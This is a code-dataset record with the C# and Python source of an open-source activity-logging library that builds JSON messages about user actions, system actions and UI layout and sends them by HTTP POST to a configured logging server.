Example: \n /// <example>\"BankAccountTableView component refreshed datasource\"</example></param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON message.</returns>\n public String logSystemActivity<T>(String ISOTimestamp, String actionDescription, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<string,object> SystemActivityMessage = new Dictionary<string,object>();\n\n writeHeader(SystemActivityMessage);\n\n SystemActivityMessage.Add(\"timestamp\", ISOTimestamp);\n\n SystemActivityMessage.Add(\"type\",\"SYSACTION\");\n\n Dictionary<string, object> parms = new Dictionary<string, object>();\n parms.Add(\"desc\", actionDescription);\n SystemActivityMessage.Add(\"parms\", parms);\n\n SystemActivityMessage.Add(\"metadata\",softwareMetadata);\n\n return convertToJSON(SystemActivityMessage);\n }\n /// <summary>\n /// Log a User Activity.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datastore.\"</example></param>\n /// <param name=\"userActivity\">A key word defined by each software component or application indicating which \n /// software-centric function is is most likely indicated by the this user activity. See the Activity Logging \n /// API for a standard set of user activity key words. </param>\n /// <param name=\"userWorkflowState\">\n /// This value must be one of the Workflow Codes defined in this library. See the Activity Logging API \n /// for definitions of each workflow code. Example:\n /// <example> \n /// ac = new ActivityLogger();\n /// ...\n /// userWorkflowState = ac.WF.SEARCH\n /// </example>\n /// </param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON log message.</returns>\n /// <remarks>\n /// <see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUserActivity</code>\n /// to log actions initiated by an explicit user action. For example, if a software component refreshes a \n /// data store when the user clicks a Reshresh UI element, that activity should be logged as a User Activity.\n /// However, if the datastore was refreshed automatically after a certain time span, that activity should NOT\n /// be logged as a User Activity, but rather as a System Activity.\n /// </remarks>\n public String logUserActivity(String ISOTimestamp, String actionDescription, String userActivity, WF userWorkflowState, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logUserActivity<Object>(ISOTimestamp, actionDescription, userActivity, userWorkflowState, recastMetaData);\n }\n /// <summary>\n /// Log a User Activity, with optionally nested metadata.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. 
Example: \n /// <example>\"BankAccountTableView component refreshed datastore.\"</example></param>\n /// <param name=\"userActivity\">A key word defined by each software component or application indicating which \n /// software-centric function is is most likely indicated by the this user activity. See the Activity Logging \n /// API for a standard set of user activity key words. </param>\n /// <param name=\"userWorkflowState\">\n /// This value must be one of the Workflow Codes defined in this library. See the Activity Logging API \n /// for definitions of each workflow code. Example:\n /// <example> \n /// ac = new ActivityLogger();\n /// ...\n /// userWorkflowState = ac.WF.SEARCH\n /// </example>\n /// </param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity. These values can be nested.</param>\n /// <returns>A JSON log message.</returns>\n /// <remarks>\n /// <see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUserActivity</code>\n /// to log actions initiated by an explicit user action. For example, if a software component refreshes a \n /// data store when the user clicks a Reshresh UI element, that activity should be logged as a User Activity.\n /// However, if the datastore was refreshed automatically after a certain time span, that activity should NOT\n /// be logged as a User Activity, but rather as a System Activity.\n /// </remarks>\n public String logUserActivity<T>(String ISOTimestamp, String actionDescription, String userActivity, WF userWorkflowState, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<String, Object> UserActivityMessage = new Dictionary<string, object>();\n\n writeHeader(UserActivityMessage);\n\n UserActivityMessage.Add(\"timestamp\", ISOTimestamp);\n UserActivityMessage.Add(\"type\", \"USERACTION \");\n\n Dictionary<String, Object> parms = new Dictionary<string,object>();\n parms.Add(\"desc\", actionDescription);\n parms.Add(\"activity\", userActivity);\n parms.Add(\"wf_state\", (int)userWorkflowState);\n parms.Add(\"wf_version\", workflowCodingVersion);\n\n UserActivityMessage.Add(\"parms\", parms);\n UserActivityMessage.Add(\"metadata\", softwareMetadata);\n\n return convertToJSON(UserActivityMessage);\n }\n\n /// <summary>\n /// Log the Layout of a UI Element.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView moved in User_Dashboard\"</example></param>\n /// <param name=\"uiElementName\">The name of the UI component that has changed position or visibility.</param>\n /// <param name=\"visibility\"><code>true</code> if the element is currently visibile. 
<code>false</code> if the element is completely hidden.</param>\n /// <param name=\"leftBound\">The absolute position on screen, in pixels, of the leftmost boundary of the UI element.</param>\n /// <param name=\"rightBound\">The absolute position on screen, in pixels, of the rightmost boundary of the UI element.</param>\n /// <param name=\"topBound\">The absolute position on screen, in pixels of the top boundary of the UI element.</param>\n /// <param name=\"bottomBound\">The absolute position on screen, in pixels of the bottom boundary of the UI element.</param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <remarks><see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUILayout</code>\n /// to record any changes to the position or visibility of User Interface elements on screen.</remarks>\n /// <returns>A JSON log message.</returns>\n public String logUILayout(String ISOTimestamp, String actionDescription, String uiElementName, bool visibility, int leftBound, int rightBound, int topBound, int bottomBound, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logUILayout<Object>(ISOTimestamp, actionDescription, uiElementName, visibility, leftBound, rightBound, topBound, bottomBound, recastMetaData);\n }\n\n /// <summary>\n /// Log the Layout of a UI Element, with optionally nested metadata.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView moved in User_Dashboard\"</example></param>\n /// <param name=\"uiElementName\">The name of the UI component that has changed position or visibility.</param>\n /// <param name=\"visibility\"><code>true</code> if the element is currently visibile. <code>false</code> if the element is completely hidden.</param>\n /// <param name=\"leftBound\">The absolute position on screen, in pixels, of the leftmost boundary of the UI element.</param>\n /// <param name=\"rightBound\">The absolute position on screen, in pixels, of the rightmost boundary of the UI element.</param>\n /// <param name=\"topBound\">The absolute position on screen, in pixels of the top boundary of the UI element.</param>\n /// <param name=\"bottomBound\">The absolute position on screen, in pixels of the bottom boundary of the UI element.</param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity. These can be nested.</param>\n /// <remarks><see cref=\"registerActivityLogger\"/> MUST be called before calling this function. 
Use <code>logUILayout</code>\n /// to record any changes to the position or visibility of User Interface elements on screen.</remarks>\n /// <returns>A JSON log message.</returns>\n public String logUILayout<T>(String ISOTimestamp, String actionDescription, String uiElementName, bool visibility, int leftBound, int rightBound, int topBound, int bottomBound, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<string, object> UILayoutMessage = new Dictionary<string,object>();\n \n writeHeader(UILayoutMessage);\n\n UILayoutMessage.Add(\"timestamp\", ISOTimestamp);\n UILayoutMessage.Add(\"type\", \"UILAYOUT\");\n\n Dictionary<string, object> parms = new Dictionary<string,object>();\n parms.Add(\"desc\", actionDescription);\n parms.Add(\"visibility\", visibility);\n parms.Add(\"leftBound\", leftBound);\n parms.Add(\"rightBound\", rightBound);\n parms.Add(\"topBound\", topBound);\n parms.Add(\"bottomBound\", bottomBound);\n UILayoutMessage.Add(\"parms\", parms);\n\n UILayoutMessage.Add(\"metadata\", softwareMetadata);\n\n return convertToJSON(UILayoutMessage);\n }\n\n\n //=================END ACTIVITY LOGGING FUNCTIONS========================\n\n /*=========================INTERNAL FUNCTIONS============================\n * These functions are used internally by the Activity Logger helper \n * library to generate JSON log messages.\n */\n\n private void writeHeader(Dictionary<string,object> msg)\n {\n msg.Add(\"client\", clientHostname);\n msg.Add(\"sessionID\", sessionID);\n msg.Add(\"apiVersion\", apiVersion);\n msg.Add(\"impLanguage\", implementationLanguage);\n\n Dictionary<string, object> component = new Dictionary<string,object>();\n component.Add(\"name\", componentName);\n component.Add(\"version\", componentVersion);\n msg.Add(\"component\", component);\n }\n\n \n //Write the required API version structured data element\n private String convertToJSON(Dictionary<string, object> msg)\n {\n String json = \"{\";\n\n bool isFirstElement = true;\n foreach (String key in msg.Keys)\n {\n if (msg[key] != null)\n {\n if (!isFirstElement)\n {\n json += \", \";\n }\n else\n {\n isFirstElement = false;\n }\n\n json += \"\\\"\" + key + \"\\\":\";\n\n if (msg[key] is int || msg[key] is float)\n {\n json += msg[key];\n }\n else if (msg[key] is String)\n {\n json += \"\\\"\" + msg[key] + \"\\\"\";\n }\n else if (msg[key] is bool)\n {\n bool fieldVal = (bool)msg[key];\n if (fieldVal)\n {\n json += \"true\";\n }\n else\n {\n json += \"false\";\n }\n }\n else if (msg[key] is Dictionary<string, object>)\n {\n json += convertToJSON((Dictionary<string, object>)msg[key]);\n }\n else\n {\n throw new FormatException(\"Can only serialize numbers, strings, and Dictionary<string, object>s to JSON.\");\n }\n }\n }\n\n json += \"}\";\n return json;\n\n }\n\n //Write the required Activity structured data element\n //\tWrite the UI Layout structured data element\n //Write any metadata included by the software developer\n //Internal function to encode a single structured data element \n //=======================END INTERNAL FUNCTIONS==========================\n\n }\n}\n\n" }, { "alpha_fraction": 0.6995007395744324, "alphanum_fraction": 0.7104845643043518, "avg_line_length": 37.417606353759766, "blob_id": "6644e3be82c01e35aa7286a33644306d4b6ae13e", "content_id": "7dad41c4106f1945792332a647bb599847348004", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17025, "license_type": "permissive", "max_line_length": 136, "num_lines": 443, "path": 
"/python/ActivityLogger.py", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "import socket, Queue, threading, urllib2\nimport json\nfrom random import randint\nfrom datetime import datetime\n\nclass ActivityLogger:\n\t\"\"\"\n\n\t##########################\n\tPython Activity Logger\n\t##########################\n\tDraper Laboratory, June 2013\n\t----------------------------\n\n\t\n\tThis library is intended for integration into Python 2.7 software component which is implementing the Draper \n\tActivity Logging API. To send activity log messages using this libary, components must:\n\n\t\t1. Instantiate an ``ActivityLogger`` object\n\t\t2. Call ``registerActivityLogger(...)`` to pass in required networking \n\t\t and version information.\n\t\t3. Call one of the logging functions:\n\t\t\t* ``logSystemActivity(...)``\n\t\t\t* ``logUserActivity(...)``\n\t\t\t* ``logUILayout(...)``\n\t\n\tAn example use of this library is included below::\n\t\n\t\timport ActivityLogger\n\n\t\t# Instantiate the Activity Logger\n\t\tac = ActivityLogger.ActivityLogger()\n\n\t\t# Minimally register the logger (DISCOURAGED). In this case, we register our logger object to look for the \n\t\t# Draper logging server on port 1337 at 172.16.98.9. This is the real address of the Logging Server during \n\t\t# XDATA Summer Camp 2013. No other arguments are supplied, so the software component name will be logged as \n\t\t# unknownComponent, the component version will be unknown, the User Session ID will be a random integer, \n\t\t# and the host name of this machine will be its public-facing IP address.\n\n\t ac.registerActivityLogger(\"http://172.16.98.9:1337\")\n\n\t\t# Re-register the logger. In this case, we register our logger object to look for the Draper logging server on \n\t\t# port 1337 at 172.16.98.9.We specify that this software component is version 34.87 of the software component \n\t\t# named \"Python Test Component\", the User Session ID is \"AC34523452345\", and this machine is named\n\t\t# pythonTableServer.xdata.data-tactics-corp.net\n\t\t\n\t\tac.registerActivityLogger(\"http://172.16.98.9:1337\", \"Python Test Component\", \"34.87\", \"AC34523452345\", \n\t\t\t\"pythonTableServer.xdata.data-tactics-corp.net\")\n\n\t\t# Send a System Activity Message. In this case, we send a System Activity message with the action description \n\t\t# \"Pushed query results to GUI\"\n\n\t\tac.logSystemActivity(\"Pushed query results to GUI\")\n\n\t\t# Send a System Activity Message with optional metadata included. In this case, we send a System Activity\n\t\t# message with the action description \"Pushed query results to GUI\" and optional metadata with two key-value \n\t\t# pairs of:\n\t\t# \t'rowsReturned'=314\n\t\t# \t'queryTime'='422 ms\n'\n\t\tac.logSystemActivity(\"Pushed query results to GUI\", {\"rowsReturned\":314, \"queryTime\":\"422 ms\"})\n\n\t\t# Send a User Activity Message. In this case, we send a User Activity message with the action description \n\t\t# \"Filtered results using a Histogram view\", a developer-defined user action visualFilter_Histogram, and the \n\t\t# workflow constant WF_SEARCH, defined in the Draper Activity Logging API.\n\n\t\tac.logUserActivity(\"Filtered results using a Histogram view\" , \"visualFilter_Histogram\", ac.WF_SEARCH)\n\n\t\t# Send a UI Layout Message. In this case, we send a UI Layout message with action description of\"Expand Tree \n\t\t# Node\". 
The name of the UI element is \"Cluster_Browser_List\", visibility=True, meaning SearchWindow A is \n\t\t# currently visible. The left, right, top and bottom bounds of the UI element are 200px, 450px, 200px, and 500 \n\t\t# from the top right of the screen. \n\n\t\tac.logUILayout(\"Expand Tree Node\", \"Cluster_Browser_List\", True, 200, 450, 200, 500) \n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tThe fully-qualified address of the logging server that will collect messages dispatched by this library. During \n\t\tXDATA Summer Camp 2013, the logging server is ``http://172.16.98.9:1337``.\n\t\t\"\"\"\n\t\tself.activityLogServerURL = \"\"\n\n\t\t\"\"\"\n\t\tThe name of the computer or VM on which the software component using this library is runing. In the case of\n\t\ta server-side Python component, this should be the host name of the machine on which the Python service is\n\t\trunning. By default, this field will be populated with the IP address of the machine on which this module is \n\t\texecuted.\n\n\t\tIdeally, this hostname should describe a physical terminal or experimental setup as persistently as possible.\n\t\t\"\"\"\n\t\ttry:\n\t\t \tself.clientHostname = socket.gethostname()\n\t\t\tself.clientHostname = socket.gethostbyname(socket.gethostname())\n\t\texcept Exception:\n\t\t\tpass\n\n\t\t\"\"\"\n\t\tThe name of the software component or application sending log messages from this library. Defaults to \n\t\t``unknownComponent``\n\t\t\"\"\"\n\t\tself.componentName = \"unknownComponent\"\n\n\t\t\"\"\"\n\t\tThe version number of the software component or application specified in ``clientHostname`` that is sending log\n\t\tmessages from this library. Defaults to ``unknown``.\n\t\t\"\"\"\n\t\tself.componentVersion = \"unknown\"\n\n\t\t\"\"\"\n\t\tThe unique session ID used for communication between client and sever-side software components during use of \n\t\tthis component. Defaults to a random integer.\n\n\t\tIdeally, this session ID will identify log messages from all software components used to execute a unique user \n\t\tsession.\n\t\t\"\"\"\n\t\tself.sessionID = randint(1,10000)\n\n\n\t\t\"\"\"\n\t\tSet to ``True`` to echo log messages to the console, even if they are sent sucessfully to the Logging Server.\n\t\t\"\"\"\n\t\tself.echoLogsToConsole = False\n\n\t\t\"\"\"Set to ``True`` to disable System Activity log messages.\"\"\"\n\t\tself.muteSystemActivityLogging = False\n\n\t\t\"\"\"Set to ``True`` to disable User Activity log messages.\"\"\"\n\t\tself.muteUserActivityLogging = False\n\n\t\t\"\"\"Set to ``True`` to disable UI Layout log messages.\"\"\"\n\t\tself.muteUILayoutLogging = False\n\n\t\tself.logMessageQueue = Queue.Queue(0)\n\t\tself.httpTransmissionThread = None\n\n\t\tself.running = True;\n\n\t\"\"\"\n\t******************\n\tINTERNAL CONSTANTS\n\t******************\n\t\n\tThese constant define values associated with this specific version of this library, and should not be changed by the\n\timplementor.\n\t\"\"\"\n\n\t\"\"\"The version number of the Draper Activity Logging API implemented by this library.\"\"\"\n\tapiVersion = 2\n\n\t\"\"\"The workflow coding version used by this Activity Logging API.\"\"\"\n\tworkflowCodingVersion = 1\n\t\n\t\"\"\"\n\tWORKFLOW CODES\n\t\n\tThese constants specify the workflow codes defined in the Draper Activity Logging API version <apiVersion>. One of \n\tthese constants *must* be passed in the parameter ``userWorkflowState``\tin the function ``logUserActivity``. 
\n\t\"\"\"\n\tWF_OTHER\t \t= 0\n\tWF_PLAN\t \t\t= 1\n\tWF_SEARCH\t \t= 2\n\tWF_EXAMINE\t\t= 3\n\tWF_MARSHAL\t\t= 4\n\tWF_REASON\t \t= 5\n\tWF_COLLABORATE\t= 6\n\tWF_REPORT \t\t= 7\n\n\n\t\"\"\"\n\tThe domain for all structured data elements necessary to send IETF RFC 5424 compliant Syslog messages. 15038 is \n\tDraper Lab's IANA Private Enterprise Number, and should be used in all log messages sent with this API.\n\t\"\"\"\n\tstructuredDataDomain = 15038\n\n\t\"\"\"The language in which this helper library is implemented\"\"\"\n\timplementationLanguage = \"Python\"\n\n\n\t# /*======================== REGISTRATION ============================\n\t# * These variables are assigned by calling the \n\t# * <registerActivityLogger> function below. They are persistent until\n\t# * a new ActivityLogger object is instantiated, or until modification\n\t# * by the <registerActivityLogger> function. \n\t# */\n\n\tdef writeHead(self):\n\t\t# Assemble the header fields shared by every log message type\n\t\tmsg = {}\n\n\t\tmsg['timestamp'] = datetime.now().isoformat('T') + 'Z'\n\t\tmsg['client'] = self.clientHostname\n\t\tmsg['component'] = {'name': self.componentName, 'version': self.componentVersion}\n\t\tmsg['sessionID'] = self.sessionID\n\t\tmsg['impLanguage'] = self.implementationLanguage\n\t\tmsg['apiVersion'] = self.apiVersion\n\n\t\treturn msg\n\n\n\tdef registerActivityLogger(self, activityLogServerIN, componentNameIN=None, componentVersionIN=None, \n\t\tsessionIdIN=None, clientHostnameIN=None):\n\t\n\t\t\"\"\"Register this event logger. <registerActivityLogger> MUST be called before log messages can be sent with this\n\t\tlibrary. \n\n\t\tArgs:\n\t\t\tactivityLogServerIN (str): The address of the logging server. See documentation for ``activityLogServerURL``\n\t\t\tabove. \n\n\t\tKwargs:\n\t\t\tcomponentNameIN (str): The name of the app or component using this library. See documentation for \n\t\t\t``componentName`` above. If not provided, defaults to ``unknownComponent``.\n\n\t\t\tcomponentVersionIN (str): The version of this app or component. See documentation for ``componentVersion``\n\t\t\tabove. If not provided, defaults to 'unknown'.\n\n\t\t\tsessionIdIN (str): A unique ID for the current user session. See documentation for ``sessionID`` above. If \n\t\t\tnot provided, defaults to a random integer.\n\n\t\t\tclientHostnameIN (str): The hostname or IP address of this machine or VM. See documentation for \n\t\t\t``clientHostname`` above. If not provided, defaults to the public IP address of this computer.\n\t\t\"\"\"\n\t\tself.activityLogServerURL = activityLogServerIN\n\n\t\tif componentNameIN is not None:\n\t\t\tself.componentName = componentNameIN\n\n\t\tif componentVersionIN is not None:\n\t\t\tself.componentVersion = componentVersionIN\n\n\t\tif sessionIdIN is not None:\n\t\t\tself.sessionID = sessionIdIN\n\n\t\tif clientHostnameIN is not None:\n\t\t\tself.clientHostname = clientHostnameIN\n\n\t#========================END REGISTRATION==========================\n\n\t\"\"\"\n\tDEVELOPMENT FUNCTIONALITY\n\t=========================\n\tThe properties and functions in this section allow developers to echo log messages to the console, and disable the \n\tgeneration and transmission of logging messages by this library. 
\n\t\"\"\"\n\t\n\tdef muteAllLogging(self):\n\t\t\"\"\"Disable all log messages\"\"\"\n\t\tself.muteSystemActivityLogging = True\n\t\tself.muteUserActivityLogging = True\n\t\tself.muteUILayoutLogging = True\n\n\tdef unmuteAllLogging(self):\n\t\t\"\"\"Enable all log messages\"\"\"\n\t\tself.muteSystemActivityLogging = False\n\t\tself.muteUserActivityLogging = False\n\t\tself.muteUILayoutLogging = False\n\t\n\t#=================END DEVELOPMENT FUNCTIONALITY====================\n\n\t\n\t# /*==================ACTIVITY LOGGING FUNCTIONS======================\n\t# * The 3 functions in this section are used to send Activity Log\n\t# * Messages to an Activity Logging Server. Separate functions are used\n\t# * to log System Activity, User Activity, and UI Layout Events. See \n\t# * the Activity Logging API by Draper Laboratory for more details \n\t# * about the use of these messages.\n\t# */\n\t\n\tdef logSystemActivity(self, actionDescription, softwareMetadata = {}):\n\t\t\"\"\"Log a System Activity. \n\n\t\tArgs:\n\t\t\tactionDescription (str): A string describing the System Activity performed by the component. Example: \n\t\t\t\t\"BankAccountTableView component refreshed datasource\"\n\t\tKwargs: \n\t\t\tsoftwareMetadata (dict): Any key/value pairs that will clarify or parameterize this system activity. \n\t\t\tExample: \n\t\t\t\t{'rowsAdded':'3', 'dataSource':'CheckingAccounts'}\n\n\t\t``registerActivityLogger`` **must** be called before calling this function. Use ``logSystemActivity`` to log \n\t\tsoftware actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n\t\tdata store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n\t\tif the datastore was refreshed in response to a user clicking a Refresh UI element, that activity should NOT be\n\t\tlogged as a System Activity, but rather as a User Activity, with the method ``logUserActivity``.\n\t\t\"\"\"\n\t\tmsg = None  # stays None when System Activity logging is muted\n\t\tif not(self.muteSystemActivityLogging):\n\t\t\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"SYSACTION\"\n\t\t\tmsg['parms'] = {\n\t\t\t    'desc': actionDescription\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata\n\t\t\tself.sendHttpMsg(msg)\n\n\t\treturn msg\n\t\n\n\n\tdef logUserActivity(self, actionDescription, userActivity, userWorkflowState, softwareMetadata={}):\n\t\t\"\"\"\n\t\tLog a User Activity. \n\n\t\tArgs:\n\t\t\tactionDescription (str): A string describing the User Activity performed by the component. Example: \n\t\t\t\t\"BankAccountTableView component refreshed datastore.\"\n\n\t\t\tuserActivity (str): A key word defined by each software component or application indicating which \n\t\t\tsoftware-centric function is most likely indicated by this user activity. See the Activity Logging \n\t\t\tAPI for a standard set of user activity key words. \n\n\t\t\tuserWorkflowState (int): This value must be one of the Workflow Codes defined in this library. See the \n\t\t\tActivity Logging API for definitions of each workflow code. Example:\n\t\t\t\tac = ActivityLogger()\n\t\t\t\t...\n\t\t\t\tuserWorkflowState = ac.WF_SEARCH\n\t\t\n\t\tKwargs:\n\t\t\tsoftwareMetadata (dict): Optional. Any key/value pairs that will clarify or parameterize this system activity.\n\t\t\tExample: \n\t\t\t\t{'rowsAdded':'3', 'dataSource':'CheckingAccounts'}\n\n\t\t``registerActivityLogger`` MUST be called before calling this function. 
Use ``logUserActivity`` to log actions \n\t\tinitiated by an explicit user action. For example, if a software component refreshes a data store when the user \n\t\tclicks a Refresh UI element, that activity should be logged as a User Activity. However, if the datastore was \n\t\trefreshed automatically after a certain time span, that activity should NOT be logged as a User Activity, but \n\t\trather as a System Activity.\n\t\t\"\"\"\n\t\tmsg = None  # stays None when User Activity logging is muted\n\n\t\tif not(self.muteUserActivityLogging):\n\t\t\t\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"USERACTION\"\n\t\t\tmsg['parms'] = {\n\t\t\t    'desc': actionDescription,\n\t\t\t    'activity': userActivity,\n\t\t\t    'wf_state': userWorkflowState,\n\t\t\t    'wfCodeVersion': self.workflowCodingVersion\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata\n\t\t\tself.sendHttpMsg(msg)\n\t\t\n\t\treturn msg\n\t\n\n\tdef logUILayout(self, actionDescription, uiElementName, visibility, leftBound, rightBound, topBound, bottomBound, softwareMetadata={}):\n\t\t\"\"\"\n\t\tLog the Layout of a UI Element. \n\n\t\tArgs:\n\t\t\tactionDescription (str): A string describing the UI Layout change performed by the component. Example: \n\t\t\t\t\"BankAccountTableView moved in User_Dashboard\"\n\n\t\t\tuiElementName (str): The name of the UI component that has changed position or visibility.\n\n\t\t\tvisibility (bool): ``True`` if the element is currently visible. False if the element is completely hidden. \n\n\t\t\tleftBound (int): The absolute position on screen, in pixels, of the leftmost boundary of the UI element. \n\t\t\t\n\t\t\trightBound (int): The absolute position on screen, in pixels, of the rightmost boundary of the UI element. \n\t\t\t\n\t\t\ttopBound (int): The absolute position on screen, in pixels, of the top boundary of the UI element. \n\t\t\t\n\t\t\tbottomBound (int): The absolute position on screen, in pixels, of the bottom boundary of the UI element. \n\t\t\t\n\t\tKwargs: \n\n\t\t\tsoftwareMetadata (dict): Any key/value pairs that will clarify or parameterize this system activity. Example:\n\t\t\t\t{'currentDashboardRow':'3', 'movementMode':'Snap_To_Grid'}\n\n\t\t``registerActivityLogger`` MUST be called before calling this function. Use ``logUILayout`` to record any \n\t\tchanges to the position or visibility of User Interface elements on screen.\n\t\t\"\"\"\n\t\tmsg = None  # stays None when UI Layout logging is muted\n\n\t\tif not(self.muteUILayoutLogging):\n\n\t\t\tmsg = self.writeHead()\n\t\t\tmsg['type'] = \"UILAYOUT\"\n\t\t\t# Forward the description and element name along with the geometry\n\t\t\tmsg['parms'] = {\n\t\t\t    'desc': actionDescription,\n\t\t\t    'uiElementName': uiElementName,\n\t\t\t    'visibility': visibility,\n\t\t\t    'leftBound': leftBound,\n\t\t\t    'rightBound': rightBound,\n\t\t\t    'topBound': topBound,\n\t\t\t    'bottomBound': bottomBound\n\t\t\t}\n\t\t\tmsg['meta'] = softwareMetadata\n\t\t\tself.sendHttpMsg(msg)\n\t\t\n\t\treturn msg\n\t\n\n\t# //=================END ACTIVITY LOGGING FUNCTIONS========================\n\n\t# /*=========================INTERNAL FUNCTIONS============================\n\t# * These functions are used internally by the Activity Logger helper \n\t# * library to generate RFC 5424 Syslog messages, and transmit them via \n\t# * HTTP POST messages to an Activity Logging server. 
\n\t# */\n\n\n\n\tdef httpTransmissionLoop(self):\n\t\t# Drain the message queue and POST each message to the logging server.\n\t\t# The one-second timeout lets the loop re-check self.running, so the\n\t\t# thread can exit cleanly when the logger is torn down.\n\t\twhile self.running:\n\t\t\ttry:\n\t\t\t\tnextLogMessage = self.logMessageQueue.get(block=True, timeout=1)\n\t\t\texcept Queue.Empty:\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\tactivityLogServerResponse = urllib2.urlopen(self.activityLogServerURL, nextLogMessage)\n\n\t\t\t\tactivityLogServerResponse.read()\n\t\t\t\tif activityLogServerResponse.getcode() != 200:\n\t\t\t\t\tprint \"Log message not sent. Bad response from Logging Server.\"\n\t\t\t\t\tprint \"Server address: \" + self.activityLogServerURL\n\t\t\t\t\tprint \"Response code: \" + str(activityLogServerResponse.getcode())\n\t\t\t\t\tprint \"Log Message:\"\n\t\t\t\t\tprint nextLogMessage\n\t\t\texcept Exception as err:\n\t\t\t\tprint \"Error connecting to Draper Activity Logging Server. Error is:\"\n\t\t\t\tprint err\n\t\t\t\tprint \"Server address: \" + self.activityLogServerURL\n\t\t\t\tprint \"Log Message:\"\n\t\t\t\tprint nextLogMessage\n\n\n\tdef sendHttpMsg(self, encodedLogMessage):\n\t\tif self.httpTransmissionThread is None:\n\t\t\t# Lazily start a single background sender; as a daemon thread it\n\t\t\t# cannot keep the host process alive on its own.\n\t\t\tself.httpTransmissionThread = threading.Thread(group=None, target=self.httpTransmissionLoop, name=None, args=(), kwargs={})\n\t\t\tself.httpTransmissionThread.daemon = True\n\t\t\tself.httpTransmissionThread.start()\n\t\tself.logMessageQueue.put(json.dumps(encodedLogMessage))\n\n\tdef __del__(self):\n\t\tself.running = False\n\t#=======================END INTERNAL FUNCTIONS==========================\n\t\n\t\n\n\n" }, { "alpha_fraction": 0.732758641242981, "alphanum_fraction": 0.8017241358757019, "avg_line_length": 23.200000762939453, "blob_id": "7d65cb66d8cef8d5ef31635cf753e8385d9d1091", "content_id": "382d888c021b5d0982e6f63cfc916018587d5859", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 116, "license_type": "permissive", "max_line_length": 54, "num_lines": 5, "path": "/javascript/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "Use draper.activity_logger.js\n\nActivityLogger.js will remain while transitioning over\n\nupdate: 2014-01-24 by David Reed\n" } ]
8
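The ActivityLogger record above turns on one pattern: the public logging calls only assemble a message dict and enqueue it, while a single background thread drains the queue and POSTs each JSON payload, so callers never block on the network. Below is a minimal Python 3 sketch of that same queue-plus-worker idea (the library itself targets Python 2.7 with `Queue` and `urllib2`); the `AsyncLogSender` name, the `LOG_SERVER_URL` constant, and the payload shape are illustrative assumptions, not part of the Draper API.

```python
import json
import queue
import threading
import urllib.request

LOG_SERVER_URL = "http://172.16.98.9:1337"  # example address from the docstring above


class AsyncLogSender:
    """Queue log messages and ship them from a background daemon thread."""

    def __init__(self, url):
        self.url = url
        self.messages = queue.Queue()
        # Daemon thread: an idle sender can never keep the host process alive.
        self.worker = threading.Thread(target=self._drain, daemon=True)
        self.worker.start()

    def send(self, msg_dict):
        # Returns immediately; transmission happens on the worker thread.
        self.messages.put(json.dumps(msg_dict).encode("utf-8"))

    def _drain(self):
        while True:
            payload = self.messages.get()  # blocks until a message is queued
            req = urllib.request.Request(
                self.url, data=payload,
                headers={"Content-Type": "application/json"})
            try:
                with urllib.request.urlopen(req) as resp:
                    if resp.status != 200:
                        print("Log message rejected, status:", resp.status)
            except Exception as err:
                print("Could not reach logging server:", err)


sender = AsyncLogSender(LOG_SERVER_URL)
sender.send({"type": "SYSACTION", "parms": {"desc": "Pushed query results to GUI"}})
```

As in the library's `sendHttpMsg`, failures are reported on the console rather than raised, so a dead logging server degrades logging instead of crashing the host application.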
sunilkrdeep/SteelEyeProject
https://github.com/sunilkrdeep/SteelEyeProject
aa24a3a70137d6ba758da2b968b4ee97ca25206e
02ad164957ea2175a2d47c305facdbfeadc35959
2f5e2ab12f11fee054201cd7fdcc00c351acfec1
refs/heads/master
2023-03-19T09:33:37.666280
2021-03-22T05:22:08
2021-03-22T05:22:08
350,032,272
0
0
null
null
null
null
null
